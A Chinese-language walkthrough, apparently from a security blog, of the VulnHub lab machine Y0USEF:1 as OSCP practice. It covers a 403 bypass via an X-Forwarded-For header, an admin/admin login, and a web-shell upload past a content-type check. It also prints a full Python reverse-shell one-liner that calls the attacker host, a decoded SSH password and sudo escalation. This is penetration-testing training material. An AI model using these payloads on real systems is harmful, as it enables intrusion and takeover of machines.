X黑手网
X黑手网
X黑手网

【OSCP模拟-No.4】y0usef靶机渗透测试练习

一、前言

  • 主要利用方式:403请求绕过+文件上传绕过+RCE反弹shell

二、靶机信息

  •     靶场: vulnhub.com

  •     靶机名称: Y0USEF:1

  •     难度: 中等

  •     发布时间: 2020年 12 月 10 日

  •     下载地址:https://www.vulnhub.com/entry/y0usef-1,624/

  •     备注:403bypass是一个坑,文件绕过此处略微简单,

              RCE用一句话木马进行命令执行反弹shell可以再琢磨琢磨

三、虚拟机配置

  • 这次采用的VirtualBox虚拟机,网络连接模式为:NAT模式、DHCP服务:启用、IP地址:自动分配

四、信息收集

  • 1、探测靶机ip地址

sudo arp-scan -Ieth0 -l

image

  • 2、探测靶机ip端口开放及开放端口的详细服务

sudo nmap -p-10.0.2.5 
sudo nmap -p22,80 10.0.2.5

image

  • 3、常规扫描目录

dirsearch -u 10.0.2.5

image

  • 4、扫描发现,有一个adminstration的目录,进行访问,结果显示权限不足

http://10.0.2.5/adminstration/

image

  • 5、通过403bypass,通常情况下,出现403的响应码有四种方式可以绕过(旁站访问,路径覆盖,Referer绕过和X-Forwarded-For绕过)这里用X-Forwarded-For: 127.0.0.1即可绕过

image

五、漏洞利用

  • 6、出现了登录及密码输入框,进行弱口令尝试,admin,admin

image

  • 7、成果登录进来,但每个页面的请求都需要带上X-Forwarded-For:127.0.0.1   并发现一处文件上传的地方

image

  • 8、通过测试,上传文件功能可拿shell,此功能只需小小的绕过,将content-type改为图片属性即可

image

  • 9、通过测试,传入id参数,返回uid,可判断此处可以RCE。

http://10.0.2.5/adminstration/upload/files/1653921355secid.php?cmd=id

image

  • 10、通过python反弹shell ,攻击机开启5555端口监听,浏览器访问,shell反弹成功。

http://10.0.2.5/adminstration/upload/files/1653921355secid.php?cmd=python-c 'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.15",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

image

  • 11、通过反弹的shell,查询id、查询第一个flag:user.txt

image

www-data@yousef-VirtualBox:/var/www/html/adminstration/upload/files$id
id
uid=33(www-data)gid=33(www-data) groups=33(www-data)
www-data@yousef-VirtualBox:/var/www/html/adminstration/upload/files$cd /home
cd /home
www-data@yousef-VirtualBox:/home$ls
ls
user.txt
yousef
www-data@yousef-VirtualBox:/home$cat user.txt 
cat user.txt
c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=

12、判断flag是通过base64加密,解密后发现是ssh登录的账号密码 

image

ssh :
user : yousef
pass : yousef123

六.提权

  • 13、既然是SSH,于是进行ssh登录,登录之后,查看了sudo,发现所有的操作都可进行

image

  • 14、直接sudo -s   提到root权限,并且验证ip(ip a)归属于靶机。

image

  • 15、最后提取root.txt falg ,同解base64即可

WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx

image

后记

此靶场到此结束!~

 

© 版权声明
THE END
喜欢就支持一下吧
点赞13赞赏 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容